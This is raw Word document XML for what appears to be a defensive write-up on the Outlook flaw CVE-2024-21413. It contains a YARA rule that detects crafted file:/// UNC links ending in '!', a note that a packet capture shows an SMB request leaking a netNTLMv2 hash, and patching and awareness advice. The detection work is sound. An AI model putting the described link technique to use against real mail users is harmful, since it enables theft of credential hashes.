                          <w:p w14:paraId="489A9D9E" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="003B68F4">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                              <w:t xml:space="preserve">      and 1 of ($</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="003B68F4">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                              <w:t>xr</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="003B68F4">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                              <w:t>*)</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6E9D9AA6" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="696ACD49" w14:textId="2F42D3DB" w:rsidR="003840B7" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                            <w:r w:rsidRPr="003B68F4">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F7408" id="Text Box 6" o:spid="_x0000_s1028" type="#_x0000_t202" style="position:absolute;margin-left:10.8pt;margin-top:-17.4pt;width:439.2pt;height:75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" fillcolor="#dbdbdb [1302]" strokecolor="#b4c6e7 [1300]" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="405B7F0D" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                      </w:pPr>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="003B68F4">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t>user@yourmachine</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="003B68F4">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t xml:space="preserve">:# cat cve-2024-21413.yar </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="1125D9E9" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="74257E5B" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="5D6D6A89" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="003B68F4">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t>rule EXPL_CVE_2024_21413_Microsoft_Outlook_RCE_Feb24 {</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="499CDED0" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="221CB19F" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="003B68F4">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t xml:space="preserve">   meta:</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="41D6F55B" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="6E8F80AB" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="003B68F4">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t xml:space="preserve">      description = "Detects emails that contain signs of a method to exploit CVE-2024-21413 in Microsoft Outlook"</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="12480D72" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="7138827D" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="003B68F4">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t xml:space="preserve">      author = "</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="003B68F4">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t>X__Junior</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="003B68F4">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t>, Florian Roth"</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="1FF2D878" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="42672C2A" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="003B68F4">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t xml:space="preserve">      reference = "https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability/"</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="0B16266C" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="6BCCA492" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="003B68F4">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t xml:space="preserve">      date = "2024-02-17"</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="24D25CBE" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="353CA77C" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="003B68F4">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t xml:space="preserve">      modified = "2024-02-19"</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="72F21E4E" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="4D818382" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="003B68F4">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t xml:space="preserve">      score = 75</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="7C9EDEBA" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="75D370DD" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="003B68F4">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t xml:space="preserve">   strings:</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="4B9DD2AF" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="00A85BEB" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="003B68F4">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t xml:space="preserve">      $a1 = "Subject: "</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="55DAFFC4" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="4D92E14A" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="003B68F4">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t xml:space="preserve">      $a2 = "Received: "</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="16D9A615" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="36C53112" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="45F85748" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="63393388" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="003B68F4">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t xml:space="preserve">      $xr1 = /file:\/\/\/\\\\[^"']{6,600}\.(docx|txt|pdf|xlsx|pptx|odt|etc|jpg|png|gif|bmp|tiff|svg|mp4|avi|mov|wmv|flv|mkv|mp3|wav|aac|flac|ogg|wma|exe|msi|bat|cmd|ps1|zip|rar|7z|targz|iso|dll|sys|ini|cfg|reg|html|css|java|py|c|cpp|db|sql|mdb|accdb|sqlite|eml|pst|ost|mbox|htm|php|asp|jsp|xml|ttf|otf|woff|woff2|rtf|chm|hta|js|lnk|vbe|vbs|wsf|xls|xlsm|xltm|xlt|doc|docm|dot|dotm)!/</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="247AC219" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="1474FCD2" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="003B68F4">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t xml:space="preserve">   condition:</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6713BF8E" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="7BA89E6C" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="003B68F4">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t xml:space="preserve">      </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="003B68F4">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t>filesize</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="003B68F4">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t xml:space="preserve"> &lt; 1000KB</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="0ED28E66" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="3EAD8797" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="003B68F4">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t xml:space="preserve">      and all of ($a*)</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="22378FF6" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="489A9D9E" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="003B68F4">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t xml:space="preserve">      and 1 of ($</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="003B68F4">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t>xr</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="003B68F4">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t>*)</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6E9D9AA6" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="696ACD49" w14:textId="2F42D3DB" w:rsidR="003840B7" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                      <w:r w:rsidRPr="003B68F4">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t>}</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B58505" w14:textId="77777777" w:rsidR="00C0764B" w:rsidRDefault="00C0764B" w:rsidP="00F654EC">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0201A687" w14:textId="77777777" w:rsidR="00C0764B" w:rsidRDefault="00C0764B">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D657F28" w14:textId="77777777" w:rsidR="00CE0857" w:rsidRPr="00CE0857" w:rsidRDefault="00CE0857" w:rsidP="00C75A4A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE0857">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Wireshark</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CC2F5F" w14:textId="77777777" w:rsidR="00CE0857" w:rsidRPr="00CE0857" w:rsidRDefault="00CE0857" w:rsidP="00CE0857">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE0857">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Additionally, the SMB request from the victim to the client can be seen in a packet capture with a truncated netNTLMv2 hash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7AEECB" w14:textId="0DEB2BDF" w:rsidR="00F654EC" w:rsidRDefault="00905934" w:rsidP="00F654EC">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00905934">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11FEBACB" wp14:editId="61342EFC">
            <wp:extent cx="5731510" cy="2952750"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="107525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3373" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId36"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2952750"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00F654EC" w:rsidRPr="00F654EC">
        <w:rPr>
          <w:noProof/>
          <w:vanish/>
        </w:rPr>
        <w:t>Bottom of Form</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEF4A79" w14:textId="026ECFD7" w:rsidR="00E148E7" w:rsidRDefault="00E148E7" w:rsidP="00BF003C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E148E7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CC32C5" w14:textId="77777777" w:rsidR="00870FF5" w:rsidRPr="00870FF5" w:rsidRDefault="00870FF5" w:rsidP="00870FF5">
      <w:r w:rsidRPr="00870FF5">
        <w:t>Microsoft has included patches to resolve this vulnerability in February’s “patch Tuesday” release. You can see a list of KB articles by Office build </w:t>
      </w:r>
      <w:hyperlink r:id="rId37" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00870FF5">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>here</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00870FF5">
        <w:t>. Updating Office through Windows Update or the </w:t>
      </w:r>
      <w:hyperlink r:id="rId38" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00870FF5">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Microsoft Update </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00870FF5">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Catalog</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r w:rsidRPr="00870FF5">
        <w:t> is strongly recommended.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC4891B" w14:textId="77777777" w:rsidR="00870FF5" w:rsidRPr="00870FF5" w:rsidRDefault="00870FF5" w:rsidP="00870FF5">
      <w:r w:rsidRPr="00870FF5">
        <w:t>Additionally, in the meantime, it is a timely reminder to practice general - safe - cyber security practices. For example, reminding users to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CCACF9" w14:textId="77777777" w:rsidR="00870FF5" w:rsidRPr="00870FF5" w:rsidRDefault="00870FF5" w:rsidP="00870FF5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00870FF5">
        <w:t>Do not click random links (especially from unsolicited emails)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74148FF7" w14:textId="77777777" w:rsidR="00870FF5" w:rsidRPr="00870FF5" w:rsidRDefault="00870FF5" w:rsidP="00870FF5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00870FF5">
        <w:t>Preview links before clicking them</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E3E9D2" w14:textId="77777777" w:rsidR="00870FF5" w:rsidRPr="00870FF5" w:rsidRDefault="00870FF5" w:rsidP="00870FF5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00870FF5">
        <w:t>Forward suspicious emails to the respective department responsible for cyber security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698DF720" w14:textId="77777777" w:rsidR="00870FF5" w:rsidRPr="00870FF5" w:rsidRDefault="00870FF5" w:rsidP="00870FF5">
      <w:r w:rsidRPr="00870FF5">
        <w:t>Since this vulnerability bypasses Outlook's Protected View, there is no way to reconfigure Outlook to prevent this attack. Additionally, preventing the SMB protocol entirely may do more harm than good, especially as it is essential for accessing network shares. However, you may be able to block this at the firewall level, depending on the organisation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0E3893" w14:textId="77777777" w:rsidR="000F3964" w:rsidRPr="000F3964" w:rsidRDefault="000F3964" w:rsidP="000F3964"/>
    <w:p w14:paraId="0D631364" w14:textId="77777777" w:rsidR="00F654EC" w:rsidRPr="00304941" w:rsidRDefault="00F654EC" w:rsidP="00226E70">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00F654EC" w:rsidRPr="003049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D1197" w14:textId="77777777" w:rsidR="000804BA" w:rsidRDefault="000804BA" w:rsidP="001D5D2E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6E4452C6" w14:textId="77777777" w:rsidR="000804BA" w:rsidRDefault="000804BA" w:rsidP="001D5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C2B67" w14:textId="77777777" w:rsidR="000804BA" w:rsidRDefault="000804BA" w:rsidP="001D5D2E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="05A8BE5F" w14:textId="77777777" w:rsidR="000804BA" w:rsidRDefault="000804BA" w:rsidP="001D5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347C5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2358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F4488"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C5E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F66774"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3F4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243EA8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D69C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0443997">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="533731460">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1176769502">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1424034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130"/>
    <w:rsid w:val="00050A96"/>
    <w:rsid w:val="00057216"/>
    <w:rsid w:val="000804BA"/>
    <w:rsid w:val="000826EB"/>
    <w:rsid w:val="000B0168"/>
    <w:rsid w:val="000C4C18"/>
    <w:rsid w:val="000F3964"/>
    <w:rsid w:val="001107BB"/>
    <w:rsid w:val="00133E99"/>
    <w:rsid w:val="00161D47"/>
    <w:rsid w:val="001D5D2E"/>
    <w:rsid w:val="00226E70"/>
    <w:rsid w:val="00295D37"/>
    <w:rsid w:val="002B565B"/>
    <w:rsid w:val="002D6BF3"/>
    <w:rsid w:val="002F5E4D"/>
    <w:rsid w:val="002F6E39"/>
    <w:rsid w:val="00304941"/>
    <w:rsid w:val="003054CC"/>
    <w:rsid w:val="00365BE1"/>
    <w:rsid w:val="003840B7"/>
    <w:rsid w:val="003B68F4"/>
    <w:rsid w:val="00423191"/>
    <w:rsid w:val="0045092E"/>
    <w:rsid w:val="00563EAA"/>
    <w:rsid w:val="005A1CF2"/>
    <w:rsid w:val="005F226A"/>
    <w:rsid w:val="00631FBB"/>
    <w:rsid w:val="006442C8"/>
    <w:rsid w:val="0064503A"/>
    <w:rsid w:val="00670F4D"/>
    <w:rsid w:val="006922EB"/>
    <w:rsid w:val="006B2995"/>
    <w:rsid w:val="006B7AE9"/>
    <w:rsid w:val="006C4061"/>
    <w:rsid w:val="006E06E9"/>
